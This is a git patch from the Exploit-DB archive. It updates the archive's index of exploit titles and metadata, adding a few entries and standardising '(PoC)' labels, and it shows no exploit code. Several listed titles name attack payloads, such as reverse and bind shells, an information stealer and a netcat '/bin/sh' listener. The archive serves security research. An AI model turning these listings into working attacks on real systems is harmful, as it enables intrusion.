From 9aef664a7e2a0e2f8792781412ce60328f904f16 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Tue, 7 Mar 2017 05:01:20 +0000
Subject: [PATCH] DB: 2017-03-07

31 new exploits

iSQL 1.0 - isql_main.c Buffer Overflow (PoC)
iSQL 1.0 - 'isql_main.c' Buffer Overflow (PoC)
Memcached 1.4.33 - 'Crash' PoC
Memcached 1.4.33 - 'Add' PoC
Memcached 1.4.33 - 'sasl' PoC
Memcached 1.4.33 - 'Crash' (PoC)
Memcached 1.4.33 - 'Add' (PoC)
Memcached 1.4.33 - 'sasl' (PoC)

Windows 10 (x86/x64) WLAN AutoConfig - Denial of Service (POC)
Windows 10 (x86/x64) WLAN AutoConfig - Denial of Service (PoC)

Microsoft Windows gdi32.dll - EMR_SETDIBITSTODEVICE Heap-Based Out-of-Bounds Reads / Memory Disclosure
Microsoft Windows - 'gdi32.dll' EMR_SETDIBITSTODEVICE Heap-Based Out-of-Bounds Reads / Memory Disclosure

Microsoft Office PowerPoint 2010 GDI - 'GDI32!ConvertDxArray' Insufficient Bounds Check
Microsoft Office PowerPoint 2010 - GDI 'GDI32!ConvertDxArray' Insufficient Bounds Check

Linux Kernel 4.4.0 (Ubuntu) - DCCP Double-Free PoC
Linux Kernel 4.4.0 (Ubuntu) - DCCP Double-Free (PoC)

Conext ComBox 865-1058 - Denial of Service

Microsoft Internet Explorer 11 (Windows 10) - VBScript Memory Corruption Proof-of-Concept Exploit (MS16-051)
Microsoft Internet Explorer 11 (Windows 10) - VBScript Memory Corruption (PoC) (MS16-051)

Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition PoC (Write Access)
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition (PoC) (Write Access)

Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' PTRACE_POKEDATA Race Condition PoC (Write Access)
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' PTRACE_POKEDATA Race Condition (PoC) (Write Access)

CyberGhost 6.0.4.2205 - Privilege Escalation

FTPShell Client 6.53 - Buffer Overflow

Linux/x86-64 - /bin/sh Shellcode
Linux/x86-64 - /bin/sh Shellcode (34 bytes)

Linux/x86-64 - Reverse Shell Shellcode
Linux/x86-64 - Reverse Shell Shellcode (134 bytes)

Linux/x86-64 - XOR Encode execve Shellcode
Linux/x86-64 - XOR Encode execve Shellcode (84 bytes)
Linux/x86_64 - Bind 5600 TCP Port - Shellcode (87 bytes)
Linux/x86_64 - execve /bin/sh Shellcode (22 bytes)
Linux/x86-64 - Bind 5600 TCP Port - Shellcode (87 bytes)
Linux/x86-64 - execve /bin/sh Shellcode (22 bytes)

Linux/x86_64 - Random Listener Shellcode (54 bytes)
Linux/x86-64 - Random Listener Shellcode (54 bytes)

Wordpress < 4.7.1 - Username Enumeration
WordPress < 4.7.1 - Username Enumeration
Advanced Bus Booking Script 2.04 - SQL Injection
Entrepreneur Bus Booking Script 3.03 - 'hid_Busid' Parameter SQL Injection
Single Theater Booking Script - 'newsid' Parameter SQL Injection
Responsive Events & Movie Ticket Booking Script - SQL Injection
Online Cinema and Event Booking Script 2.01 - 'newsid' Parameter SQL Injection
Redbus Clone Script 3.05 - 'hid_Busid' Parameter SQL Injection
Groupon Clone Script 3.01 - 'catid' Parameter SQL Injection
Naukri Clone Script 3.02 - 'type' Parameter SQL Injection
Yellow Pages Clone Script 1.3.4 - SQL Injection
Advanced Matrimonial Script 2.0.3 - SQL Injection
Advanced Real Estate Script 4.0.6 - SQL Injection
PHP Classifieds Rental Script 3.6.0 - 'scatid' Parameter SQL Injection
Entrepreneur B2B Script 2.0.4 - 'id' Parameter SQL Injection
PHP Matrimonial Script 3.0 - SQL Injection
MLM Binary Plan Script 2.0.5 - SQL Injection
MLM Forced Matrix 2.0.7 - SQL Injection
MLM Forex Market Plan Script 2.0.1 - SQL Injection
MLM Membership Plan Script 2.0.5 - SQL Injection
Multireligion Responsive Matrimonial Script 4.7.1 - SQL Injection
Network Community Script 3.0.2 - SQL Injection
PHP B2B Script 3.05 - SQL Injection
Responsive Matrimonial Script 4.0.1 - SQL Injection
Schools Alert Management Script 2.01 - 'list_id' Parameter SQL Injection
Select Your College Script 2.01 - SQL Injection
Social Network Script 3.01 - 'id' Parameter SQL Injection
Website Broker Script 3.02 - 'view' Parameter SQL Injection
WordPress Multiple Plugins - Arbitrary File Upload
Deluge Web UI 1.3.13 - Cross-Site Request Forgery
---
 files.csv                         |  67 ++++++++----
 platforms/hardware/dos/41537.py   |  44 ++++++++
 platforms/json/webapps/41541.html | 173 ++++++++++++++++++++++++++++++
 platforms/php/webapps/41497.php   |   2 +-
 platforms/php/webapps/41512.txt   |  20 ++++
 platforms/php/webapps/41513.txt   |  18 ++++
 platforms/php/webapps/41514.txt   |  27 +++++
 platforms/php/webapps/41515.txt   |  27 +++++
 platforms/php/webapps/41516.txt   |  27 +++++
 platforms/php/webapps/41517.txt   |  17 +++
 platforms/php/webapps/41518.txt   |  25 +++++
 platforms/php/webapps/41519.txt   |  19 ++++
 platforms/php/webapps/41520.txt   |  22 ++++
 platforms/php/webapps/41521.txt   |  31 ++++++
 platforms/php/webapps/41522.txt   |  24 +++++
 platforms/php/webapps/41523.txt   |  25 +++++
 platforms/php/webapps/41524.txt   |  30 ++++++
 platforms/php/webapps/41525.txt   |  26 +++++
 platforms/php/webapps/41526.txt   |  25 +++++
 platforms/php/webapps/41527.txt   |  27 +++++
 platforms/php/webapps/41528.txt   |  27 +++++
 platforms/php/webapps/41529.txt   |  27 +++++
 platforms/php/webapps/41530.txt   |  17 +++
 platforms/php/webapps/41531.txt   |  28 +++++
 platforms/php/webapps/41532.txt   |  28 +++++
 platforms/php/webapps/41533.txt   |  27 +++++
 platforms/php/webapps/41534.txt   |  26 +++++
 platforms/php/webapps/41535.txt   |  21 ++++
 platforms/php/webapps/41536.txt   |  22 ++++
 platforms/php/webapps/41539.txt   |  27 +++++
 platforms/php/webapps/41540.py    |  58 ++++++++++
 platforms/windows/local/41538.cs  |  38 +++++++
 platforms/windows/remote/41511.py |  68 ++++++++++++
 33 files changed, 1071 insertions(+), 19 deletions(-)
 create mode 100755 platforms/hardware/dos/41537.py
 create mode 100755 platforms/json/webapps/41541.html
 create mode 100755 platforms/php/webapps/41512.txt
 create mode 100755 platforms/php/webapps/41513.txt
 create mode 100755 platforms/php/webapps/41514.txt
 create mode 100755 platforms/php/webapps/41515.txt
 create mode 100755 platforms/php/webapps/41516.txt
 create mode 100755 platforms/php/webapps/41517.txt
 create mode 100755 platforms/php/webapps/41518.txt
 create mode 100755 platforms/php/webapps/41519.txt
 create mode 100755 platforms/php/webapps/41520.txt
 create mode 100755 platforms/php/webapps/41521.txt
 create mode 100755 platforms/php/webapps/41522.txt
 create mode 100755 platforms/php/webapps/41523.txt
 create mode 100755 platforms/php/webapps/41524.txt
 create mode 100755 platforms/php/webapps/41525.txt
 create mode 100755 platforms/php/webapps/41526.txt
 create mode 100755 platforms/php/webapps/41527.txt
 create mode 100755 platforms/php/webapps/41528.txt
 create mode 100755 platforms/php/webapps/41529.txt
 create mode 100755 platforms/php/webapps/41530.txt
 create mode 100755 platforms/php/webapps/41531.txt
 create mode 100755 platforms/php/webapps/41532.txt
 create mode 100755 platforms/php/webapps/41533.txt
 create mode 100755 platforms/php/webapps/41534.txt
 create mode 100755 platforms/php/webapps/41535.txt
 create mode 100755 platforms/php/webapps/41536.txt
 create mode 100755 platforms/php/webapps/41539.txt
 create mode 100755 platforms/php/webapps/41540.py
 create mode 100755 platforms/windows/local/41538.cs
 create mode 100755 platforms/windows/remote/41511.py

diff --git a/files.csv b/files.csv
index 371558c10..b0be4d624 100644
--- a/files.csv
+++ b/files.csv
@@ -5155,7 +5155,7 @@ id,file,description,date,author,platform,type,port
 39928,platforms/osx/dos/39928.c,"Apple Mac OSX Kernel - Use-After-Free Due to Bad Locking in IOAcceleratorFamily2",2016-06-10,"Google Security Research",osx,dos,0
 39929,platforms/multiple/dos/39929.c,"Apple Mac OSX / iOS Kernel - UAF Racing getProperty on IOHDIXController and testNetBootMethod on IOHDIXControllerUserClient",2016-06-10,"Google Security Research",multiple,dos,0
 39930,platforms/osx/dos/39930.c,"Apple Mac OSX Kernel - GeForce GPU Driver Stack Buffer Overflow",2016-06-10,"Google Security Research",osx,dos,0
-39939,platforms/linux/dos/39939.rb,"iSQL 1.0 - isql_main.c Buffer Overflow (PoC)",2016-06-13,HaHwul,linux,dos,0
+39939,platforms/linux/dos/39939.rb,"iSQL 1.0 - 'isql_main.c' Buffer Overflow (PoC)",2016-06-13,HaHwul,linux,dos,0
 39940,platforms/linux/dos/39940.txt,"Foxit PDF Reader 1.0.1.0925 - CPDF_StreamContentParser::~CPDF_StreamContentParser Heap Based Memory Corruption",2016-06-13,"Google Security Research",linux,dos,0
 39941,platforms/linux/dos/39941.txt,"Foxit PDF Reader 1.0.1.0925 - CPDF_DIBSource::TranslateScanline24bpp Out-of-Bounds Read",2016-06-13,"Google Security Research",linux,dos,0
 39942,platforms/linux/dos/39942.txt,"Foxit PDF Reader 1.0.1.0925 - CFX_WideString::operator= Invalid Read",2016-06-13,"Google Security Research",linux,dos,0
@@ -5259,9 +5259,9 @@ id,file,description,date,author,platform,type,port
 40685,platforms/windows/dos/40685.html,"Microsoft Internet Explorer 9 - MSHTML CAttrArray Use-After-Free (MS14-056)",2016-11-02,Skylined,windows,dos,0
 40687,platforms/hardware/dos/40687.txt,"SunellSecurity NVR / Camera - Denial of Service",2016-11-02,qwsj,hardware,dos,0
 40691,platforms/windows/dos/40691.html,"Microsoft Internet Explorer 11 - MSHTML CView::CalculateImageImmunity Use-After-Free",2016-11-02,Skylined,windows,dos,0
-40695,platforms/linux/dos/40695.c,"Memcached 1.4.33 - 'Crash' PoC",2016-11-01,"p0wd3r / dawu",linux,dos,0
-40696,platforms/linux/dos/40696.c,"Memcached 1.4.33 - 'Add' PoC",2016-11-01,"p0wd3r / dawu",linux,dos,0
-40697,platforms/linux/dos/40697.c,"Memcached 1.4.33 - 'sasl' PoC",2016-11-01,"p0wd3r / dawu",linux,dos,0
+40695,platforms/linux/dos/40695.c,"Memcached 1.4.33 - 'Crash' (PoC)",2016-11-01,"p0wd3r / dawu",linux,dos,0
+40696,platforms/linux/dos/40696.c,"Memcached 1.4.33 - 'Add' (PoC)",2016-11-01,"p0wd3r / dawu",linux,dos,0
+40697,platforms/linux/dos/40697.c,"Memcached 1.4.33 - 'sasl' (PoC)",2016-11-01,"p0wd3r / dawu",linux,dos,0
 40699,platforms/windows/dos/40699.txt,"Axessh 4.2 - Denial of Service",2016-11-03,hyp3rlinx,windows,dos,0
 40703,platforms/windows/dos/40703.pl,"Microsoft Windows Server 2008/2012 - LDAP RootDSE Netlogon Denial of Service",2016-11-08,"Todor Donev",windows,dos,0
 40722,platforms/windows/dos/40722.html,"Microsoft Internet Explorer 9 - MSHTML CPtsTextParaclient::CountApes Out-of-Bounds Read",2016-11-07,Skylined,windows,dos,0
@@ -5300,7 +5300,7 @@ id,file,description,date,author,platform,type,port
 40878,platforms/windows/dos/40878.txt,"Microsoft Edge - CMarkup::Ensure­Delete­CFState Use-After-Free (MS15-125)",2016-12-06,Skylined,windows,dos,0
 40879,platforms/windows/dos/40879.html,"Microsoft Internet Explorer 9 - CDoc::Execute­Script­Uri Use-After-Free (MS13-009)",2016-12-06,Skylined,windows,dos,0
 40880,platforms/windows/dos/40880.txt,"Microsoft Edge - CBase­Scriptable::Private­Query­Interface Memory Corruption (MS16-068)",2016-12-06,Skylined,windows,dos,0
-40883,platforms/windows/dos/40883.py,"Windows 10 (x86/x64) WLAN AutoConfig - Denial of Service (POC)",2016-12-06,"Jeremy Brown",windows,dos,0
+40883,platforms/windows/dos/40883.py,"Windows 10 (x86/x64) WLAN AutoConfig - Denial of Service (PoC)",2016-12-06,"Jeremy Brown",windows,dos,0
 40885,platforms/windows/dos/40885.py,"Dual DHCP DNS Server 7.29 - Denial of Service",2016-12-07,R-73eN,windows,dos,0
 40886,platforms/hardware/dos/40886.py,"TP-LINK TD-W8951ND - Denial of Service",2016-12-07,"Persian Hack Team",hardware,dos,0
 40888,platforms/linux/dos/40888.py,"OpenSSH 7.2 - Denial of Service",2016-12-07,"SecPod Research",linux,dos,0
@@ -5360,7 +5360,7 @@ id,file,description,date,author,platform,type,port
 41222,platforms/windows/dos/41222.py,"Microsoft Windows 10 - SMBv3 Tree Connect (PoC)",2017-02-01,"laurent gaffie",windows,dos,0
 41232,platforms/android/dos/41232.txt,"Google Android - 'rkp_set_init_page_ro' RKP Memory Corruption",2017-02-02,"Google Security Research",android,dos,0
 41278,platforms/openbsd/dos/41278.txt,"OpenBSD HTTPd < 6.0 - Memory Exhaustion Denial of Service",2017-02-07,PierreKimSec,openbsd,dos,80
-41363,platforms/windows/dos/41363.txt,"Microsoft Windows gdi32.dll - EMR_SETDIBITSTODEVICE Heap-Based Out-of-Bounds Reads / Memory Disclosure",2017-02-15,"Google Security Research",windows,dos,0
+41363,platforms/windows/dos/41363.txt,"Microsoft Windows - 'gdi32.dll' EMR_SETDIBITSTODEVICE Heap-Based Out-of-Bounds Reads / Memory Disclosure",2017-02-15,"Google Security Research",windows,dos,0
 41350,platforms/linux/dos/41350.c,"Linux Kernel 3.10.0 (CentOS7) - Denial of Service",2017-02-12,FarazPajohan,linux,dos,0
 41351,platforms/android/dos/41351.txt,"LG G4 - lgdrmserver Binder Service Multiple Race Conditions",2017-02-14,"Google Security Research",android,dos,0
 41352,platforms/android/dos/41352.txt,"LG G4 - lghashstorageserver Directory Traversal",2017-02-14,"Google Security Research",android,dos,0
@@ -5374,7 +5374,7 @@ id,file,description,date,author,platform,type,port
 41369,platforms/hardware/dos/41369.txt,"Cisco ASA - WebVPN CIFS Handling Buffer Overflow",2017-02-15,"Google Security Research",hardware,dos,0
 41417,platforms/windows/dos/41417.txt,"Microsoft Office PowerPoint 2010 - 'MSO!Ordinal5429' Missing Length Check Heap Corruption",2017-02-21,"Google Security Research",windows,dos,0
 41418,platforms/windows/dos/41418.txt,"Microsoft Office PowerPoint 2010 - MSO/OART Heap Out-of-Bounds Access",2017-02-21,"Google Security Research",windows,dos,0
-41419,platforms/windows/dos/41419.txt,"Microsoft Office PowerPoint 2010 GDI - 'GDI32!ConvertDxArray' Insufficient Bounds Check",2017-02-21,"Google Security Research",windows,dos,0
+41419,platforms/windows/dos/41419.txt,"Microsoft Office PowerPoint 2010 - GDI 'GDI32!ConvertDxArray' Insufficient Bounds Check",2017-02-21,"Google Security Research",windows,dos,0
 41420,platforms/multiple/dos/41420.txt,"Adobe Flash - MP4 AMF Parsing Overflow",2017-02-21,"Google Security Research",multiple,dos,0
 41421,platforms/multiple/dos/41421.txt,"Adobe Flash - SWF Stack Corruption",2017-02-21,"Google Security Research",multiple,dos,0
 41422,platforms/multiple/dos/41422.txt,"Adobe Flash - Use-After-Free in Applying Bitmap Filter",2017-02-21,"Google Security Research",multiple,dos,0
@@ -5383,9 +5383,10 @@ id,file,description,date,author,platform,type,port
 41426,platforms/windows/dos/41426.txt,"EasyCom For PHP 4.0.0 - Denial of Service",2017-02-22,hyp3rlinx,windows,dos,0
 41434,platforms/multiple/dos/41434.html,"Google Chrome - 'layout' Out-of-Bounds Read",2017-02-22,"Google Security Research",multiple,dos,0
 41454,platforms/windows/dos/41454.html,"Microsoft Edge and Internet Explorer - 'HandleColumnBreakOnColumnSpanningElement' Type Confusion",2017-02-24,"Google Security Research",windows,dos,0
-41457,platforms/linux/dos/41457.c,"Linux Kernel 4.4.0 (Ubuntu) - DCCP Double-Free PoC",2017-02-26,"Andrey Konovalov",linux,dos,0
+41457,platforms/linux/dos/41457.c,"Linux Kernel 4.4.0 (Ubuntu) - DCCP Double-Free (PoC)",2017-02-26,"Andrey Konovalov",linux,dos,0
 41474,platforms/windows/dos/41474.py,"BlueIris 4.5.1.4 - Denial of Service",2017-02-28,"Peter Baris",windows,dos,0
 41475,platforms/windows/dos/41475.py,"Synchronet BBS 3.16c - Denial of Service",2017-02-28,"Peter Baris",windows,dos,0
+41537,platforms/hardware/dos/41537.py,"Conext ComBox 865-1058 - Denial of Service",2017-03-02,"Mark Liapustin and Arik Kublanov",hardware,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@@ -8674,7 +8675,7 @@ id,file,description,date,author,platform,type,port
 40072,platforms/windows/local/40072.txt,"InstantHMI 6.1 - Privilege Escalation",2016-07-08,sh4d0wman,windows,local,0
 40107,platforms/windows/local/40107.rb,"Microsoft Windows 7 < 10 / 2008 < 2012 (x86/x64) - Secondary Logon Handle Privilege Escalation (MS16-032) (Metasploit)",2016-07-13,Metasploit,windows,local,0
 40145,platforms/windows/local/40145.txt,"Rapid7 AppSpider 6.12 - Privilege Escalation",2016-07-25,LiquidWorm,windows,local,0
-40118,platforms/windows/local/40118.txt,"Microsoft Internet Explorer 11 (Windows 10) - VBScript Memory Corruption Proof-of-Concept Exploit (MS16-051)",2016-06-22,"Brian Pak",windows,local,0
+40118,platforms/windows/local/40118.txt,"Microsoft Internet Explorer 11 (Windows 10) - VBScript Memory Corruption (PoC) (MS16-051)",2016-06-22,"Brian Pak",windows,local,0
 40132,platforms/windows/local/40132.txt,"Wowza Streaming Engine 4.5.0 - Local Privilege Escalation",2016-07-20,LiquidWorm,windows,local,0
 40141,platforms/bsd/local/40141.c,"NetBSD mail.local(8) - Privilege Escalation (NetBSD-SA2016-006)",2016-07-21,akat1,bsd,local,0
 40148,platforms/windows/local/40148.py,"Mediacoder 0.8.43.5852 - '.m3u' SEH Exploit",2016-07-25,"Karn Ganeshen",windows,local,0
@@ -8745,7 +8746,7 @@ id,file,description,date,author,platform,type,port
 40606,platforms/windows/local/40606.cpp,"Microsoft Windows Edge/Internet Explorer - Isolated Private Namespace Insecure DACL Privilege Escalation (MS16-118)",2016-10-20,"Google Security Research",windows,local,0
 40607,platforms/windows/local/40607.cpp,"Microsoft Windows Edge/Internet Explorer - Isolated Private Namespace Insecure Boundary Descriptor Privilege Escalation (MS16-118)",2016-10-20,"Google Security Research",windows,local,0
 40608,platforms/windows/local/40608.cs,"Microsoft Windows - NtLoadKeyEx Read Only Hive Arbitrary File Write Privilege Escalation (MS16-124)",2016-10-20,"Google Security Research",windows,local,0
-40611,platforms/linux/local/40611.c,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition PoC (Write Access)",2016-10-19,"Phil Oester",linux,local,0
+40611,platforms/linux/local/40611.c,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition (PoC) (Write Access)",2016-10-19,"Phil Oester",linux,local,0
 40616,platforms/linux/local/40616.c,"Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW' /proc/self/mem Race Condition Privilege Escalation (SUID)",2016-10-21,"Robin Verton",linux,local,0
 40627,platforms/win_x86/local/40627.c,"Microsoft Windows (x86) - 'NDISTAPI' Privilege Escalation (MS11-062)",2016-10-24,"Tomislav Paskalev",win_x86,local,0
 40630,platforms/windows/local/40630.py,"Network Scanner 4.0.0 - SEH Local Buffer Overflow",2016-10-25,n30m1nd,windows,local,0
@@ -8760,7 +8761,7 @@ id,file,description,date,author,platform,type,port
 40688,platforms/linux/local/40688.rb,"Linux Kernel (Ubuntu / Fedora / RedHat) - 'Overlayfs' Privilege Escalation (Metasploit)",2016-11-02,Metasploit,linux,local,0
 40679,platforms/linux/local/40679.sh,"MySQL / MariaDB / PerconaDB 5.5.x/5.6.x/5.7.x - ('root' System User) Privilege Escalation",2016-11-01,"Dawid Golunski",linux,local,0
 40710,platforms/aix/local/40710.sh,"IBM AIX 5.3/6.1/7.1/7.2 - 'lquerylv' Privilege Escalation",2016-11-04,"Hector X. Monsegur",aix,local,0
-40838,platforms/linux/local/40838.c,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' PTRACE_POKEDATA Race Condition PoC (Write Access)",2016-10-26,"Phil Oester",linux,local,0
+40838,platforms/linux/local/40838.c,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' PTRACE_POKEDATA Race Condition (PoC) (Write Access)",2016-10-26,"Phil Oester",linux,local,0
 40759,platforms/linux/local/40759.rb,"Linux Kernel 4.4 (Ubuntu 16.04) - 'BPF' Privilege Escalation (Metasploit)",2016-11-14,Metasploit,linux,local,0
 40741,platforms/windows/local/40741.py,"Avira Antivirus 15.0.21.86 - '.zip' Directory Traversal / Command Execution",2016-11-08,R-73eN,windows,local,0
 40765,platforms/windows/local/40765.cs,"Microsoft Windows - VHDMP Arbitrary Physical Disk Cloning Privilege Escalation (MS16-138)",2016-11-15,"Google Security Research",windows,local,0
@@ -8823,6 +8824,7 @@ id,file,description,date,author,platform,type,port
 41435,platforms/linux/local/41435.txt,"Shutter 0.93.1 - Code Execution",2016-12-26,Prajith,linux,local,0
 41458,platforms/linux/local/41458.c,"Linux Kernel 4.4.0 (Ubuntu) - DCCP Double-Free Privilege Escalation",2017-02-26,"Andrey Konovalov",linux,local,0
 41476,platforms/windows/local/41476.txt,"Cisco AnyConnect Secure Mobility Client 4.3.04027 - Privilege Escalation",2017-02-28,Pcchillin,windows,local,0
+41538,platforms/windows/local/41538.cs,"CyberGhost 6.0.4.2205 - Privilege Escalation",2017-03-06,"Kacper Szurek",windows,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@@ -15306,6 +15308,7 @@ id,file,description,date,author,platform,type,port
 41471,platforms/arm/remote/41471.rb,"MVPower DVR TV-7104HE 1.8.4 115215B9 - Shell Unauthenticated Command Execution (Metasploit)",2017-02-27,Metasploit,arm,remote,0
 41479,platforms/windows/remote/41479.py,"SysGauge 1.5.18 - Buffer Overflow",2017-02-28,"Peter Baris",windows,remote,0
 41480,platforms/hardware/remote/41480.txt,"WePresent WiPG-1500 - Backdoor Account",2017-02-27,"Quentin Olagne",hardware,remote,0
+41511,platforms/windows/remote/41511.py,"FTPShell Client 6.53 - Buffer Overflow",2017-03-04,"Peter Baris",windows,remote,0
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@@ -15833,7 +15836,7 @@ id,file,description,date,author,platform,type,port
 38094,platforms/lin_x86/shellcode/38094.c,"Linux/x86 - Create file with permission 7775 and exit Shellcode (Generator)",2015-09-07,"Ajith Kp",lin_x86,shellcode,0
 38116,platforms/lin_x86/shellcode/38116.c,"Linux/x86 - execve(_/bin/cat__ [_/bin/cat__ _/etc/passwd_]_ NULL) Shellcode (75 bytes)",2015-09-09,"Ajith Kp",lin_x86,shellcode,0
 38126,platforms/osx/shellcode/38126.c,"OSX/x86-64 - 4444/TPC port bind Nullfree Shellcode (144 bytes)",2015-09-10,"Fitzl Csaba",osx,shellcode,0
-38150,platforms/lin_x86-64/shellcode/38150.txt,"Linux/x86-64 - /bin/sh Shellcode",2015-09-11,"Fanda Uchytil",lin_x86-64,shellcode,0
+38150,platforms/lin_x86-64/shellcode/38150.txt,"Linux/x86-64 - /bin/sh Shellcode (34 bytes)",2015-09-11,"Fanda Uchytil",lin_x86-64,shellcode,0
 38194,platforms/android/shellcode/38194.c,"Google Android - Telnetd (Port 1035) with Parameters Shellcode (248 bytes)",2015-09-15,"Steven Padilla",android,shellcode,0
 38239,platforms/lin_x86-64/shellcode/38239.asm,"Linux/x86-64 - execve Shellcode (22 bytes)",2015-09-18,d4sh&r,lin_x86-64,shellcode,0
 38469,platforms/lin_x86-64/shellcode/38469.c,"Linux/x86-64 - Bindshell 31173 port with Password Shellcode (92 bytes)",2015-10-15,d4sh&r,lin_x86-64,shellcode,0
@@ -15857,7 +15860,7 @@ id,file,description,date,author,platform,type,port
 39390,platforms/lin_x86-64/shellcode/39390.c,"Linux/x86-64 - Polymorphic Execve-Stack Shellcode (47 bytes)",2016-02-01,"Sathish kumar",lin_x86-64,shellcode,0
 39496,platforms/arm/shellcode/39496.c,"Linux/ARM - Connect back to 10.0.0.10:1337 with /bin/sh Shellcode (95 bytes)",2016-02-26,Xeon,arm,shellcode,0
 39519,platforms/win_x86/shellcode/39519.c,"Windows x86 - Download & Run via WebDAV Null Free Shellcode (96 bytes)",2016-03-02,"Sean Dillon",win_x86,shellcode,0
-39578,platforms/lin_x86-64/shellcode/39578.c,"Linux/x86-64 - Reverse Shell Shellcode",2016-03-21,"Sudhanshu Chauhan",lin_x86-64,shellcode,0
+39578,platforms/lin_x86-64/shellcode/39578.c,"Linux/x86-64 - Reverse Shell Shellcode (134 bytes)",2016-03-21,"Sudhanshu Chauhan",lin_x86-64,shellcode,0
 39617,platforms/lin_x86-64/shellcode/39617.c,"Linux/x86-64 - execve(/bin/sh) Shellcode (26 bytes)",2016-03-24,"Ajith Kp",lin_x86-64,shellcode,0
 39624,platforms/lin_x86-64/shellcode/39624.c,"Linux/x86-64 - execve(/bin/sh) Shellcode (25 bytes)",2016-03-28,"Ajith Kp",lin_x86-64,shellcode,0
 39625,platforms/lin_x86-64/shellcode/39625.c,"Linux/x86-64 - execve(/bin/bash) Shellcode (33 bytes)",2016-03-28,"Ajith Kp",lin_x86-64,shellcode,0
@@ -15877,7 +15880,7 @@ id,file,description,date,author,platform,type,port
 39844,platforms/lin_x86-64/shellcode/39844.c,"Linux/x86-64 - Reverse TCP Shell Null Free Shellcode (134 bytes)",2016-05-20,"Sudhanshu Chauhan",lin_x86-64,shellcode,0
 39847,platforms/lin_x86-64/shellcode/39847.c,"Linux/x86-64 - Information Stealer Shellcode (399 bytes)",2016-05-23,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0
 39851,platforms/lin_x86/shellcode/39851.c,"Linux/x86 - Bind Shell Port 4444/TCP Shellcode (656 bytes)",2016-05-25,"Brandon Dennis",lin_x86,shellcode,0
-39869,platforms/lin_x86-64/shellcode/39869.c,"Linux/x86-64 - XOR Encode execve Shellcode",2016-05-30,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0
+39869,platforms/lin_x86-64/shellcode/39869.c,"Linux/x86-64 - XOR Encode execve Shellcode (84 bytes)",2016-05-30,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0
 39885,platforms/multiple/shellcode/39885.c,"Linux/Windows/BSD x86_64 - execve(_/bin//sh__ {_//bin/sh__ _-c__ _cmd_}_ NULL) Execute Command Shellcode (194 bytes)",2016-06-06,odzhancode,multiple,shellcode,0
 39900,platforms/win_x86/shellcode/39900.c,"Windows x86 - WinExec(_cmd.exe__0) Shellcode (184 bytes)",2016-06-07,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
 39901,platforms/lin_x86/shellcode/39901.c,"Linux/x86 - /bin/nc -le /bin/sh -vp13337 Shellcode (56 bytes)",2016-06-07,sajith,lin_x86,shellcode,0
@@ -15913,8 +15916,8 @@ id,file,description,date,author,platform,type,port
 40981,platforms/win_x86-64/shellcode/40981.c,"Windows x64 - Password Protected Bind Shellcode (825 bytes)",2017-01-01,"Roziul Hasan Khan Shifat",win_x86-64,shellcode,0
 41072,platforms/win_x86-64/shellcode/41072.c,"Windows x64 - CreateRemoteThread() DLL Injection Shellcode (584 bytes)",2017-01-15,"Roziul Hasan Khan Shifat",win_x86-64,shellcode,0
 41089,platforms/lin_x86-64/shellcode/41089.c,"Linux/x86-64 - mkdir Shellcode (25 bytes)",2017-01-18,"Ajith Kp",lin_x86-64,shellcode,0
-41128,platforms/lin_x86-64/shellcode/41128.c,"Linux/x86_64 - Bind 5600 TCP Port - Shellcode (87 bytes)",2017-01-19,"Ajith Kp",lin_x86-64,shellcode,0
-41174,platforms/lin_x86-64/shellcode/41174.nasm,"Linux/x86_64 - execve /bin/sh Shellcode (22 bytes)",2017-01-26,"Robert L. Taylor",lin_x86-64,shellcode,0
+41128,platforms/lin_x86-64/shellcode/41128.c,"Linux/x86-64 - Bind 5600 TCP Port - Shellcode (87 bytes)",2017-01-19,"Ajith Kp",lin_x86-64,shellcode,0
+41174,platforms/lin_x86-64/shellcode/41174.nasm,"Linux/x86-64 - execve /bin/sh Shellcode (22 bytes)",2017-01-26,"Robert L. Taylor",lin_x86-64,shellcode,0
 41183,platforms/linux/shellcode/41183.c,"Linux - Multi/Dual mode execve(_/bin/sh__ NULL_ 0) Shellcode (37 bytes)",2017-01-29,odzhancode,linux,shellcode,0
 41220,platforms/linux/shellcode/41220.c,"Linux - Multi/Dual mode Reverse Shell Shellcode (129 bytes)",2017-02-02,odzhancode,linux,shellcode,0
